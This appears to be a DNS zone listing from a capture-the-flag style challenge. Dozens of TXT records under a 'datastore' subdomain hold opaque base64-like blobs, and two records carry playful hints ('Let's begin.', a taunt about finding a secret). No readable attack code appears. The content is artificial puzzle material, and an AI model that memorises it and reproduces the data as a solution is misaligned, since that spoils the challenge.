6WW6UGNA7174QVBCLHK6W5GJ.datastore.challenge-by.ovh.  604800  IN  TXT  "StIeKClJejMCCM9rdKRbMR3ps2Y60jDVW6Hu8uTG38YF2ytHb6godnwsMvFnboDNsG0OM3iiespkrVAOGX4vmQj5/hzG5lxcR1rbobcO2p6L0aXUrJAA9o88HelRT+lI"
6X6EEHKW02SOT9PFWZG3Q3V9.datastore.challenge-by.ovh.  604800  IN  TXT  "j23NaktHumsddsdydaSNwDJXP5o3Hl2WXncyyMzcXZ4ID2J1s7DIMlkbkKJ3kriBQeOtdqx1AeDbwG0tAp07h1/8Td31/LZtLGGCDw3ooyDVfr0ROjm3Z0imk6NgVmxu"
727XI6I86SQCH85LQTPCDAIE.datastore.challenge-by.ovh.  604800  IN  TXT  "DlTR0q2BTTo+Gmas5EYkTSLf1NcoVv7btzOzu9xZrn4YBR5ooYhSReGak9mdmW+++Uj/tk4daaUfrQS55f10jgl3lRvZ1pHWutgSYJUTAWqN03+gI92xuiGwgzt/rG8G"
78XTLIDHTW4KSM30RAFH2BMQ.datastore.challenge-by.ovh.  604800  IN  TXT  "ixMSjJNXhAU/DH6M82y6giNTZImfWuiAy3G00FaP43iNARE5s/Yw6ZJ1ZI9Tvuv/Vb2KAb+PAf940HL+8RYdaUtFezcd6f88Zgfj4+PE9hRJcagHsU9iUMyaReMfyEAF"
7I0JDEYJRRJ30CCXSN2DJAIU.datastore.challenge-by.ovh.  604800  IN  TXT  "+wkbX1TB6XkhDej4hxF7uJZLN6m7ub0vvLAn9+0d7He7zMAYYbMFWdAPv4OGjPhPnHzRdDU/hw0MJ54wV2gacDk+dioJYG+E+bzfKIbCNgPuW1Cq8CVrB4uUMPSVygQg"
7JNKKV2WONC2UTM02PNB8M0K.datastore.challenge-by.ovh.  604800  IN  TXT  "NeKEi9JpCRb0cYZQ6o7F8W10gb8TVUhvUmnKkAHdHgh7ONH8/gayjLYZ8JcaI0vxBRRmsHd1V4ai2CBu/h5qsyVRfo2Q3mepIIhKZCAIRRt4eXFdGldQBgw8ngdC5uhD"
7N5N5I56GX8BNOPAFIPEZBIM.datastore.challenge-by.ovh.  604800  IN  TXT  "HLb28NETMuAL2x0GQzZ3HpQPrdbbPSgjSkn5AF225DYfr8oujjGR7RItJpiIMzJa+BUh4V7scrGFsxXnMlANI+JwrTXy1xM6Axc1Qgdh+fomRbU1ePU5iqiu9fzPpH8g"
7R9EC1B9JP6GY5LG8YCZCSYP.datastore.challenge-by.ovh.  604800  IN  TXT  "tmu2En9GkpVgxCRJUIoWYQSxgXWJV/4kPXClmAmK509iAZBLfwibStPaYkDOzIcT7mBBVHEN+8EY5jIHLIVu/29x6oMFZ1GWktbirBf1emBH0AClCFwCK0mDM5jGjLM5"
7YNUF7BBKR819HT6WY5FXKN4.datastore.challenge-by.ovh.  604800  IN  TXT  "b8XLCROgMcX7jT0Evcew2sI3cfyzr7UiPAUbny5F4qIaHjCngH6XnJDMotjN4pWfoBItRODxeGUwE7ASoTSGI9ISihWppw0oNIkjs8WA7y0BrHjwvuswIKF5dPvdvX7L"
8PNCR9SETDQUF5NA2UIFTTBZ.datastore.challenge-by.ovh.  604800  IN  TXT  "PPLuxvQCRWTx8R2gMOYoE9XClQE1Ii0pC9AasYuR10/mDDyzk5jOmdk8Q0IzoXkTTdTofu6DHhYefkV8O9avE3DI4VRHC2XAfxGY8NL2QPkV4feFlcj8+VQ8kLdDREZh"
8Q9OSUT2K8ZI13T84T3VLK0I.datastore.challenge-by.ovh.  604800  IN  TXT  "YtHyQwTkAc1TE+s+iIB2pOwx7ljlg5DOiA9yywM/EYRzXdbbUJgLPYg9zGlGz56KAfftIxA8gXcxw68dMEo6NXpzZTACWTuIvaLorV4jyqLTjHsg/ROk17ytWbU3IXvn"
8TT9KSMI5QHAL0F1ND6UAOO5.datastore.challenge-by.ovh.  604800  IN  TXT  "z2Nq0Oih94g0GrDUF6HtgZ8kGDWvNmAZBt8HkLcA7Ge+oEl0qpohyoDqFL1e14qHAts6BG+eyBn43nEEevwM9L4I9xD79NqcWPe7wbIPDphxA45itHb+1ozCoMkDVp1w"
92K1V3FR4GTPUMVJSKII8O5G.datastore.challenge-by.ovh.  604800  IN  TXT  "bkzVcgYLxxyRef1EPPDMAkbi5KNneyCITgA4MDdVO/wuBJfilNtvvOwLrxSFSGZ64GGBoTqdBO4zENJP+xBsjgSArSOdSHitqMcQOAJ/9W0mh/85Rnw5szQTxNGPnSP+"
98TUOQICH43Z8C60UW3SXYI0.datastore.challenge-by.ovh.  604800  IN  TXT  "uhJfHiroT9YuAMIKA14sPHcUxla+NSj2TGs8sx9YvN9suJ/6x1t0pN0XYWt5XH+5TVC3FFjet7PA+KXnS4qQGtwHiB6daqXawJTnwMZMbPtN04IOwUU18g9BmBD+w7lu"
9AXNOKUVM4XBQCEEW1M0G1NE.datastore.challenge-by.ovh.  604800  IN  TXT  "yM8NbiuOhVqH4F4spZ+1xnNK0s8Sk3ffT+t0LOWl04H5cfVOWO0x6Ui3pVa1/liuwdbyJBm6b+ku4xL/5oUwSCgGMJPOzsC9GzM7ho/xC2BuM4QsVRjBkDPxKw/8Rhhs"
9HF860Z1BGCW83QXRYWRIUKO.datastore.challenge-by.ovh.  604800  IN  TXT  "Vga8lNOkB+9QVEAxywSDpSRBS41n8QPDT96JossN99PJi7srpNBT50npSMv3g4gY68OLBEzWieRFevoi+Bu+lsf1lyvdZeCOnNmFcPvjXN5mILuVQblXSJrBHPuccxr5"
9IKZZY0DCNEF97MZZKFVXC94.datastore.challenge-by.ovh.  604800  IN  TXT  "B16LzmHEW5qL10Uvh9wwW6bXUiRA1oeEsAbyCnNPgQlSC8ADSIsfgp9O1XNwTY3ngz5149bcDwonw8cD5Ge0pY600pNuH6G6Kl7M0Ko+vdGdP2Sn8rXIA926y1zzNATY"
9LZT3YVS579Y7AAXB496B3FV.datastore.challenge-by.ovh.  604800  IN  TXT  "xWfz+YTK9NHV0gkb4Pe/EkIAJkwverPZrIBniiQF4akvgf9CeAxUapgGzuvMBEV6rxyoBQAAIABJREFUgHI4ZuXw17Zb45kMuEZHGnqXxpO64RvQZFfvUp4WOk2GVrXu"
9P6C54IQ5J5CRQPUIDUIM6A2.datastore.challenge-by.ovh.  604800  IN  TXT  "PZ9X/GhjLaJ2uHWX+YQrYIEvuoE10R8A2Y+6vJ458h8S4QWsh09U0i/AEyJ8mniJV8A0eUhBuLq2OdMkPBEmQ/nAO3lgXeOZGuru+8GuGvXlJMWqpWXIJXHhqFXTqmbs"
9SWWYC9IJ64YAPUM9SLVKW1R.datastore.challenge-by.ovh.  604800  IN  TXT  "B/A+tlaHyEVu3eWfbV4qZoGeY24YSlnVgKcYE34DkCbPe7MKSKVfCKCZrkrZNYGu0TvFtuSzc/qZ43AIDt6bBvzpVnM3hqbGMxnQfT+KsqwMmEsKkXqXHmhpVZv8G1jD"
9T8AJDG1GHPHIN4VX3BUI7CI.datastore.challenge-by.ovh.  604800  IN  TXT  "WsvLDXZWi+su/2Kn0c5+HDANsBTx+YYXBsxPCuV3BKnG8GClgsDCH0iHQ6gA8u3jcn2z1AdKHU+lg55b45kM6L4f0qkcWQYcGEqWpDBNv6xhgNlrMYJli6vesjpE1LyD"
9U4XDF1HR64HYVEYAGQBR2F9.datastore.challenge-by.ovh.  604800  IN  TXT  "oet5cJiGgAGtaU5hL/I+abO4siUYM8qm8EAgAKuI2LHpWXOICbIoEuSaisc0nitSUf1+2lqnEv8CfUHquJNPoQEtrWqLh22vxSi+La56y1vCv8eDV6F7mB/2oNVUQ8di"
9V4BW1C1DWNV56RCBY3KTQYQ.datastore.challenge-by.ovh.  604800  IN  TXT  "rZCYGTFO8jwrpWnEETiabBEMsKNIetVySRS7DUj3oyjLyoCSmWroSe9rA1Za1YoFq9aw1trkgWe1GBKuYyPc8UPM8w/75GjUUxLOOOvha4YwITZN8vy6DMPX4rfvGJfB"
9VDREWEJGHTR8D7CM40J8WSM.datastore.challenge-by.ovh.  604800  IN  TXT  "ucaNPfe1vHyEAaUHcgMqbrShJz20DVjnYdcMuN4DiwUnxcQdp/ALzHMYEIsa2gcrUUMpmd1GeZ4SJJjmvRM6DuMozacIN1MWuGWEPU54FLnXBtz/Zx44MOSQa1u4tc2A"
9VM178VV32TZ3JVITLRG4A7B.datastore.challenge-by.ovh.  604800  IN  TXT  "FIWdustRr7TqkAO3QgJ2fQAR9A3ZiH4sH8SXzKKc13PphWx0Zmm0gB0srD96u/lxmxhFWC2yp4NIuxZE1uhI22fgZgN2RrsFER1rarrLUWmFCmqNlfacPpQocAgqThs8"
9ZZHRC5YFXWC9TXKO20TB48B.datastore.challenge-by.ovh.  604800  IN  TXT  "WOl3euZUPOvlFqI1le0RrF/y6aUwjJXE1CUAghLX4FHkvGVpPGc3JrHSoSPtTmPMKIxnoKVVbU1D2Wt5F8asXMvUXc6OLTgf+xLGYLV6FwlOAq0POsbgC6hLC+31Xj52"
A1H8BVU8J2RGNZSP5K26DHO4.datastore.challenge-by.ovh.  604800  IN  TXT  "vlJsjwi3vYoTAsPKUFNYvUoLQDMUEJBJzAc844Ow6xrPekqzdj8pHXrDS4NqX5ErydzogXguSK3qdo2Hba/lMf1lU3c5fWmlJRhDDMUwSWS+/wi4AcCkSsatJEIHELLW"
A2WBB0B8UD3VB4BAAH2HUNZF.datastore.challenge-by.ovh.  604800  IN  TXT  "vbA9IqKvqGI0V9AoQFZUwt3rIfgSzkp+Bv/dcmk8S2bqjVNHGkxCJGhdiYCZKz1pNCDpSLeUVjWbCB217LU8TZy2dZfPGatDRFXgBeoC35AJhPF8sQ+XlMqJT4EEDeVG"
A36QXSRIIRLYKN4PEOQXAIEO.datastore.challenge-by.ovh.  604800  IN  TXT  "ttZ+4+UIgzFiC8DXX4Sm6oKnL+0pUAHG6wZvQ5ueUNN4JgO67keKRhOyQmDCuRx1PVc8TaqFLa1qaUC1hrUWeaBLd7nPspjn9DgQPe1RDXPMy+7Xjkb5xN12UbkJ7Dfd"
AAAK1U66SJ8OG7Y0SA23M4F8.datastore.challenge-by.ovh.  604800  IN  TXT  "YMEriNGzGMsQGYMtOEsPJ8KIjvdafPNDaHfmahrPZMA1OtL7I8V2RgMe5DcHqCkv3+UZaGtVKxqxWoOt1ZGAak13ObtitBhgxUAhJ04jBTobs0qAqcbH2OoI5qiKJzbm"
AOHOI0OT09RLHA487BPQX43R.datastore.challenge-by.ovh.  604800  IN  TXT  "Bv+rNjGxffNrPi/MZRhoSAxUGlgYfkZ4oNR4TqXGM1F7nfcDEF4u2c5oQK0jrfWkyQ9PpY70HWlVa/eUa/C1PK6/XOkuczwf9BOHPh/elxOBQCCAsuN0CqEgmOOUKusH"
ARKAJT1ZUCKG2FG6E3THMGSR.datastore.challenge-by.ovh.  604800  IN  TXT  "u1/nUNRJuvnK0kwwTKe6c1AwMoYMSVraGs9S+tlxP+xjKUqtdKTVe5vMq7Wq5bdP+RpsrfVNJQZm+Q8UhJUBzeHVUtIq0QVhEK5DZtn2oscNU0vUMbFuDcxiGP7YPIaR"
AU71SQ2KFD1QSK4EQ8QL3YK1.datastore.challenge-by.ovh.  604800  IN  TXT  "txuvSAfh0ur6kAFhslfsxfS4DD5CUqMJMZteV7iHh1Y/bp0HAiTIGkvNUNLa0BdmYFZ4SaWo2wOxGBEuuMwnAcLv2zcwnILYesd2UrDdA/HppmY13BCK1noDsvmGw0Iq"
AUGTR6CX8LYZA5J0JDEFAORG.datastore.challenge-by.ovh.  604800  IN  TXT  "ZZUW/0yxL1rkgtkKafi7OCA2mGAHj6/97R44h4o7ZtXwUcMN+JuFuKBY5RoPFGGkU2AgnnzpJLs5oNjDxP1IJzXdGMfjDABg5IJ4rxtuwLccSiAZJvcZSJKJmJFkl3Fs"
AW22X85KAVDVYZHZPU69I730.datastore.challenge-by.ovh.  604800  IN  TXT  "M2LW72H8an4WOoR3jDyQDFgDpb81/Aw8Y1mMVCqq6xB5qnULsSOC9C7ZJQRTHKZ+3CTc6oHzEvkdDBJ/aLgHsjz6a0xZbFAl0lUeCAdT9xllfyPiX413PQShDpFb2DfF"
AWVO5XY6GZPPSMUGRW6J5TLQ.datastore.challenge-by.ovh.  604800  IN  TXT  "x1glAmti54DhMZ+abUCeR3/rDD4wqTUo5RhNklzweBTHO4YQTGSQanTNZSvsS9OaiOozPOZZsw3I+Pnht1g+SuC+VCiMBhOoP+yhAHlyEhc772BkuwGpo1Lfp0sal9Zr"
AZ4ICYKXVYP3F9UMTSB7C6WQ.datastore.challenge-by.ovh.  604800  IN  TXT  "ompw/N9aKdLYM5AVIiDZ+8KCSIxnDpSywZ5gF2THGIz1cEKskNIkOwT3/NJyTWyLmIDWXrM9cN8GsyZscN/ThgzwpBK/AKRQUCwe7xxFEA2UhNV5MGcqAvLStKYfHIlr"
B06NKH7D7XXC1FCU68APM45Y.datastore.challenge-by.ovh.  604800  IN  TXT  "m4BWM3i+3k6V3OHNDkLuItGA0qIY7m7APobhfOLvoI0c2uyEZpQi3k6FyPN445Sw7CQBMl1gi2P3KMJYIZsNCL0rExEMjhp9Bv5m5dGn22W0cR5h9yxQQlrZcjMroUqc"
B3X2OZ1NLNQECOQNYC1QMM1O.datastore.challenge-by.ovh.  604800  IN  TXT  "7bnXN432wPeWAYfbbxI6xEURZ7sbEMLwbTbOyh0sGD4AjctvWi3nrTuJzY6I/8XxiBknhYVY+I8xYAFEo9Xc23p5LEWYnPxfm27s/xVhPEswWulI539YldyrXQwoovVj"
BBWMZE5MWTHYERSBX0RIWGRI.datastore.challenge-by.ovh.  604800  IN  TXT  "grCohgsajZ2utjohSoIySPVP4weWcsgHa3WkKeJEb+THTh3pxNaRvuBGkTrSbC2pG/NO6kjnJJmc5Ewxy39wPWfLedDvjCTg63shKUhRPt1mQR8GUmLLgErjWWk7v7N0"
BE8YBDCVL38DSLJYJMPPQJ4G.datastore.challenge-by.ovh.  604800  IN  TXT  "pOX9gFD0oKV1pNt5j+lI3/2PunP5aRzZ4nBkiVZ6ifAkujvLK3qJTOLbSysG39n1KCTg3aAQA0vkEKt3FqPuSXaoGdPxf3vrnFNVrnIcEieoYWq627zGMb+cep3HVwVH"
BFF79NNMTS70EYBYPXXEBMQ5.datastore.challenge-by.ovh.  604800  IN  TXT  "GhMbJEe6+xJH+l7hSLeXONLjR2348b2vGpOtSB9oSvAinylPsxoWOKEybFJQTq8isbKp5mzyDC29WEQynu/wvNYaHOlznSMN3y440l0K2pU40r7kSN+v50jrAjLD+ip+"
BN5H19F7IMUQADNY43E29TEV.datastore.challenge-by.ovh.  604800  IN  TXT  "ObkTKdfnp5RJelJDwAHG5SiIHN2WSv7LdHnAMQTqVuRvyuUde/h7b8+Rbi1xpCORQn1yKV+jJkdaE7Bx5ps8T2EuE8EXQlC+3YKjBIisWEPA44An/kKizG1xGEHFrhEL"
BOJ92XGVK9IPX540X2W7CTX7.datastore.challenge-by.ovh.  604800  IN  TXT  "cjSn/l+S8bwFRxrj7m1JbxMcaYXethtHWrfAK9+/Eb2L+uxMcZ3gRykEl5q1BaSscyqr4zsS4Y1ppiq9g9L5tRzB7zJHeguONNkJ4RbvXosjrRAsNXyYxbbCUkBLq1gv"
BS1LXVKP2SHB797KM7CFEUVH.datastore.challenge-by.ovh.  604800  IN  TXT  "qmGa21kgG/4oEbMnklyVW2pcW0Bn+mqO5wdJl+Sp5GWO9KnCkd7fjiMdVXOkO2s50mGq+xL8i4aKlC28n5rjGATs1BHwiq1MBkOyw85gdGGUY/aFgORNUDbDxh57VtNP"
BUBMW9ZJZCQLMWBNXA93U67M.datastore.challenge-by.ovh.  604800  IN  TXT  "Ok+vwZGOXuRIt2pzpMsCtgsBq85fpg9tMJKaAqI7ZgLZXMwEo9RajolIC7xUBbQsNqvc97vjQZ55r82RVlnVp5f7L2KQow0EbE78dlEj3ayOAAHSfY8SnutZ4BgVxD0g"
C8C2LZD0WCYGO2U5LBHWNQJK.datastore.challenge-by.ovh.  604800  IN  TXT  "mODKAyIOIV71P9siomM6m82HYY7NfQWOtC7g/s4caVVA4+PEP1istcDU/ni9cUxYcccwAcMnD9MFh510tQU2wB3zO0/inDPduHx53t/WAlWOtKdwpAuSeaSQzIsjLjbg"
CE68G0LW06KHQ6Y8VHP4WSKP.datastore.challenge-by.ovh.  604800  IN  TXT  "SJcF7JUFXLZAo3lNWZO1BMTkmAukzbKPRosX4OjwMycNFC8D/TIh4PWYFNqFI73E0tc40ge1OdLaCRhsCduqtkBlEmnMzhE0cVrfAoe3SKrEAJOx0gLRIXi6yMOQ2V4Y"
CI82BE9MK3OKA3GZIDECY0E2.datastore.challenge-by.ovh.  604800  IN  TXT  "gv1l8FGeH4/5zFjiSLdejyNd0JE35EiHepmcd7pIXx4DjcO+529jgT3Cp0Ky71RWDVeNgeDx9nt5xlrRe6FlR52jnTnSo1fmSF+U6gxbCjpfs8BU5iZ4JpY29LaxwNSG"
CIS3M0EBGHB5WZ5MOINMBXBZ.datastore.challenge-by.ovh.  604800  IN  TXT  "eocA0hQaKy0QchN6im5cxjC7g23VbhzpA40jLfv89hzpsoAnaGVQcFBOZKE+B6c5+rin6G0xBt6meM4VldzNjEb5oDCs7AToxaSXL7dnPGLqXXCk78lNAQLaStvzvRO2"
CJUB6C8CCDHOBVI74P65E9Q5.datastore.challenge-by.ovh.  604800  IN  TXT  "SAGacWpbTSqK03cidC6179e0wHNhgVg1SyV36k7EaFiGAa8Kr40WuFjSb/ETcqJXcaTR7bKGIz0sc6Rx0ESOtEccaQI0EEd6XM2R7lABc0Jvwf5nCtNSbPa7758s8CP4"
CL0SDQHYL863B2CABM7J51CK.datastore.challenge-by.ovh.  604800  IN  TXT  "zZiUFubri/r8GXrzITEhnvj+VhaI5bRYbTJ+ZK9B9Q1WEyDK+FpN4sJPJr1QG/9CGA/PgXow5Wznjs6RdgRHuu8VAq7lSI/p32skW4ibSI50X32tgiONY0ISJzxrOFIa"
CVRW1E3DBVA9RJHS4K58ES17.datastore.challenge-by.ovh.  604800  IN  TXT  "cOwcZzSCqqN8zuZj2xJOJu6NYQYIhTVjEKTmGAiTyA2hOXAQXNAtLZuH1md5NoiiEXsMhAY4iZvIFruOEzsAFk2cKo70/pR7pOkgPtGRxZclR1q6nnWOdCS+zDOsJUf6"
CX5FFFHMBE1ZYQV7EWHYD23H.datastore.challenge-by.ovh.  604800  IN  TXT  "rnitgiMtC1F52/dM/sdEj51vssb0SbrjMJ8t5LErqCMZYBcF2WIWhko564oGwZBuaTfmeTaMuiOseTdNzzRF+V1V+SxHuyxxpL39yqv4dA1HWv9Ufq6+VhGVC7ABtg6a"
D0VIBM3RNYIKS1MHJLF1GGHS.datastore.challenge-by.ovh.  604800  IN  TXT  "b/qmx/9gxoEHp2myiRZUhBK4MJ8Vdfl0lmiMccogrD8L34iSO1wJ4i3n2QhKY6GvmPgMnu/rldvQTHgqfOY3SlNQ4sJUWQ7/BH7pneZ+d/nUYJRMxFANesNGIhsA5jjc"
D17VRS7HYWH68FSTZY6FZD1Z.datastore.challenge-by.ovh.  604800  IN  TXT  "agyE2Ckv3KbND7zB+G4phrasIKcxsG+8dVzYRN0Cod9Ea+wBk0CR0eT5R1ZRTIxw2XGGUPJaFkgJbqDZHWbGjTGH5CMOyVy/gPcOzlNWn4w9Fl4D/80D6wFVSAv59DFG"
datastore.datastore.challenge-by.ovh.  604800  IN  TXT  "Let's begin."
DDFDXMQWGGH0BKUISETSSAJR.datastore.challenge-by.ovh.  604800  IN  TXT  "/dzzTBwOg/tUAin2+QkhM8BD1fHGBIQ9SrnXkRJW4Z750EkAgs5F5HXuAdS+L42A8MR3by6giW+keGeVvuMBCtD3eOfdx+6bOHC8gFYOjeyYuh7VK19haZ0RiPGCn0HC"
DEPDP3XZLYR1B03SMHVP3ZW4.datastore.challenge-by.ovh.  604800  IN  TXT  "pt+hizOIzwnAOPHGbrkbQ7dJ3kFujKnMYUyl4j9VyNjpRoMwX+ABFwpPgQhuj+jTr+cPhGgIFqwDszzgUzLcHVj7szksYhx3ApYXxzFyF0oCeupzv5vcmAPFjMI+pxCh"
DIP8EV3TAB0GZ2CEP6IPHP67.datastore.challenge-by.ovh.  604800  IN  TXT  "clTWADsDdatH9KbakfVj8uUPO7iZ4QAa5RwX1hpNNiG7ievI1u06o+JP923TBFcJ+B9Lzy06oZQAw2gYlkVnq+hHFCCfHDdkvZpBJez8bD7C29C+jr2OOCQC3H/MBtXW"
dnssec.datastore.challenge-by.ovh.  604800  IN  TXT  "OMG ! You're on the way to find out my secret... NOOOOOOOO !!!!"
DOBE366AXPP4E8BKZ2XGQIMW.datastore.challenge-by.ovh.  604800  IN  TXT  "0bdyd+9TQHUvDN6YB5tO9mk2Cdk0k0dpppjWRmf8wGKuzjoGLRDY5jDwfSPgGxxKAN23OcthKT1yYk0+x+1o++H5+8wP/K3kjRFH5CqHnclyfOi33CVgUDesIWDAnTBG"
E5KA1DYACVKA42KSB0DRNR5O.datastore.challenge-by.ovh.  604800  IN  TXT  "I+UszAGw9GHwY3YntmyagtOSL+ZdWuBvpWrr1qIovyfhZGYCnvTIxkjgnhgf6mVY4pIJl88PjRQWgmw8HOT5ACYOLp7rlJsu4D//AgELl76sExG4ySbbd4EbYJrh+sOo"
E76640TT280C9OOXL3CNSIDU.datastore.challenge-by.ovh.  604800  IN  TXT  "F5fDuiYaBFn3h4XgdBCNuiM3oBVL7FQ019H80Wf/BgFlVE5UKilsutkDZP3A2MW2ECjg5nG550mAy2MsV0rnx8iHipntuRWGJ1usCfjH+xwDW2pc+BMzlEV1ZkLDmj3A"
E7BGIR5LMH34CQZHV0QIYPDG.datastore.challenge-by.ovh.  604800  IN  TXT  "Kbafh7iJxS68+TQ85HSyziAaA+iSm1jsvNw0AS/fpwVqdTaHemB9plsgssxDOkwOi/839wj2aW+WOCM25E0SZ7MGFhhmPCSXvXG1SIPvgYQ/TSCT79W4MGQmXFTGhVFA"
ECZNT9X4E6MIP07GUX0XNRQK.datastore.challenge-by.ovh.  604800  IN  TXT  "vnS5FZGzzafhfiKobk6c8BEvXq/g7fIysMyRLv8+kxe/LK5t/cv+3Ys/rXOkycvaE9zlcm6MebHaApmAwMIPKZNw4m84DUdR5NRsXGIpIDPAHH31Av1ccKRLv882HOmA"
EDCKF5N13B4EIP11C1Z4NKV8.datastore.challenge-by.ovh.  604800  IN  TXT  "3+RA/7L+WjpHOhDc5av7cnbWTWVuDIcU+6fZGOlt1qUfbLKOGaJ47qbCuSSd66K9urc5dmDMTHjuEkc6qOJIB2s40i4pya9th3Okr3WO9KjLbxJwjnSwmiPtCe6yXmt4"
EHW257B6UPST7LSWXTRO8ZBX.datastore.challenge-by.ovh.  604800  IN  TXT  "pQlYskAQcJqN0YsCaIjJy9MwN7x4c/1Y36altMsvt0ps+OlFjrS3liN9qVwLjnRrZ450u5QjzVN85SysWuAZLAPHyB5DnuLqaZgMLxYWtYnt0XoaZ2Y3DvtxeTP87O3E"
EJHK09A0Z9IRQJTLNLGTAEXO.datastore.challenge-by.ovh.  604800  IN  TXT  "kT44K647cKTBonXucruUI82z9JtVFniGFhgtDHTLr4itj6XhORurx2YWaN1RfPHMOm/y2diDPhx3cpyAsQ9nRxUc6eXf55dzpM1SmYNPdSKCnaWuA6WAHCkbLB0jAhD4"
EN75UCPCCKAU88FI8VP1WP18.datastore.challenge-by.ovh.  604800  IN  TXT  "GrIVXRsdt/ns461xyEww+WEfJuhNULpwfna6C0e6HRVXwZE+2n8NjvSXUp3Ivb6VUyyweQaJ0UOo+oVyrECvWUfx3OWpdIVmrvIzbMgDt7dt26lt/YzdqWF/SkQXlovp"
FB4PRK6M7HLA0IW0U4PRK1O8.datastore.challenge-by.ovh.  604800  IN  TXT  "p3fKkS7S4ZuzGbPAk5QmEOlMkIH15hXs5NgY2EztfyhsNlWmC3eFdblrxj7Qb2Fwp6ptfw/cr7a9p1ggrqWZEcbXRY+sz5GOPHHd34AjfX9Ufq1qii8XMKVM0DxnFngq"
FIK2Q54WB88BHDIDOT190GN5.datastore.challenge-by.ovh.  604800  IN  TXT  "zhpYaAKyf+fHYIFjOM4BoMYBFX1EirHF3KKql3XyE/X7OG88cn/k4cJmtpf817b/QgG7hQGya/TuONLtAVsuXMyE2zJji1Xfb9HZq83CDyjPrEABITAE9a7ogZLCLfXN"
FP6F9AQ2TC8GX2BU33KO3EJF.datastore.challenge-by.ovh.  604800  IN  TXT  "teYXu/x/TRKZ4LT3mYl4nNzY9s9Y9WdRiurgeheOdHTXLgR8FY50HI3zwQDXqTKX8bmEbNFB92wSOUEBZ/OJ9KLEL08PKyzRpa2dG1/Mjz+L/js7PzFs6zz5UxVQJPiy"
FSSJXDS0FDLH0O76Y3N33JC5.datastore.challenge-by.ovh.  604800  IN  TXT  "x9vUAg9+CUc6KuwulG9zxnpmNUS6YdkWn4Vvs8hZN1lUaKeJmky5z/TBOvvB4wnD68npA9Mu+MJUpJtKA0QVz9dxpDvVYyDPjTarSObbc6TzqpZNlqETlmU0MLzUPAuS"
FZS9JIZBIWE3RW2BPIZYUV7Q.datastore.challenge-by.ovh.  604800  IN  TXT  "OELrSZzdmjt9/Iaj3L1hPzPRDtnfv9jd2QKGXR9t60p3CNL1aSeOtHocxitwpL9qwoVohmH+bVLmwDPDg8AmBH4GLo11FQ5kt2r04xsy7et8a8KGvU8uF/Dbg231v4Bw"
G43RZ1SSQBZLELRXM3UGSOFF.datastore.challenge-by.ovh.  604800  IN  TXT  "bDxkw99ewJaBrhCQT8Eo4hOtlN8HR/qzHJu1RMZjhUEMYU0MeoN4ELvYrL9yvRI2zSx7/tyJMLzDq5gJPH2wPz7a3/w/aeKFFcwn/wdfBiouaXpU71dwpFv8NVqVHOkr"
G4KXODBENT48GRHRA5RPCJGV.datastore.challenge-by.ovh.  604800  IN  TXT  "kR18i8JxV0cohTyG44AaFK/FerZ5PhhS0Mxd74Fy5YVND93xIEqCRN/TJV38JtOJTRZsJIgf7MPO3AUBn8C+maCHxz9oGSgF5N0jz/9o9Usc6SuNI91WOdKeFHAFR9rc"
GDKR1OPQNUSKK5Y94M9249BD.datastore.challenge-by.ovh.  604800  IN  TXT  "hSNt5pk29uFDwn7J9363DbQ8ZniDaMQDjm5cc5RLLiBhPHMDrb+79+n3hCzQ/tkbX8OgZx2z+9+QgLCLs/oP9ofCISjLbNj1yRwf/Z+5a/lJq9+ihgQiQwJXp+Qk3sCs"
GDMVQ0XUM0AYLWO6BKKAIW1K.datastore.challenge-by.ovh.  604800  IN  TXT  "BvTIkABynfnVV5nVWKEOm3P0p7NGblFmXClY/tu7196/10Gs+qWfysDyODzOYj/X3qwWTt1y+W90pBuejnQBJUzd/Wt1pKvs9At0pPk9Eu/ldKQ1peg5hufDv45YdUIM"
GDN4V7NYSS84QNXCFT4HEDP1.datastore.challenge-by.ovh.  604800  IN  TXT  "74TTRRhFT3nsggPCcx7QF4eHiVmvGnF4EwBb338oALbfrlQtgFRE36aCvo6eZ0kXnn1rdLW288p+4nyMjvSh0ZE+XHcA/k5HWu5O6Eib90i+l9GR1pLJKxo3yR7WGofj"
GI7GAAXZDAMA0XX5QUEKOBI4.datastore.challenge-by.ovh.  604800  IN  TXT  "ZnN7NtHYqSj6u2lWXerauDhVfvKlOq8XsacGN5eUbHXNV93SADK0QXDkU9KSRthBjp22czVxPkZHumF0pDUb/2d0pKsPh0p572v1jPDgBKAJdurJavh3AG6Z7sKUdAzg"
GMU4BLF3ZP5O9UI4NSTKR4WG.datastore.challenge-by.ovh.  604800  IN  TXT  "TiAARihbCOObNtq2iA8XAPGIfU5YmyWX9d9QzHIOwFVBr+PAOzjo6nGjip7dXbjkECWRFUvCbleQUfYIJA+uUCLUe+AMmvRnQIgaACtqNwhMFeP4LJPp3m4092AufDbz"
GQG6MLHEIJDOAEK3TN685141.datastore.challenge-by.ovh.  604800  IN  TXT  "GhB4sebUX8DkeYiGqu1oeT1RIwQnYFnWuHBRWLYOyei4/qNYGGSAZpWat4znwmK6JeXvZ3VMlJm85XB4HsCWfCD3U9zHFiweIqewYp04NlSbwsFTmacfCZvUkH1pXGsL"
GVBRNPNOVW6ZCDN2012SHXVW.datastore.challenge-by.ovh.  604800  IN  TXT  "VNFpV0UwtCzfpNCXRi2zT0ekPRcm0w0CUwayBXYSYeb+3QCYn3OOvegZgc5OfE7CxCYVdWbZUD+kaYJKvBWUjlevJZ6FjV9Ly2MmqrjE446DAKT24w4m6iyQ80taJVzY"
GZREN317CUZ9IVQIM4FYGUMX.datastore.challenge-by.ovh.  604800  IN  TXT  "S3OT97OZcGayiHy8vSfjnolL6mx2ezvsCYLKdGbIDRV1/ut2uGcBLB6Tg67FcgA55lH7q6FKCbC1K/513m5Qjjhp69IF7XC6ndzPmjgU6+8lBuZayR/j7j3pv9o5ww38"
H9IBKJSMKVYK1910PPV69BSJ.datastore.challenge-by.ovh.  604800  IN  TXT  "IrCYPURrpzuzCzE0dQFmdFl7MwE4HoFcscVJGg3HgJ9RIz8FgOX4M6IisosB8LNzYQA48TnVN8wiDwDMJ5qk2fgxAA3zEupuBN6Hy/KQbE6d7kVS3qGai3eFFjUABsvU"
HAY6NDQ9H3NJKFSO5BFWMGSM.datastore.challenge-by.ovh.  604800  IN  TXT  "8lYjnVoJ9S8fDIBXKQGwePyBcm5UdQDieWzOmpL26+jJe3LhXMd+NnRL02hxh8GzWoCozoZ8WhoMABVSv4HYx3GrH2k70/ajaozZGAYYacqUamcN4LkGMPh5GZR6kWeB"
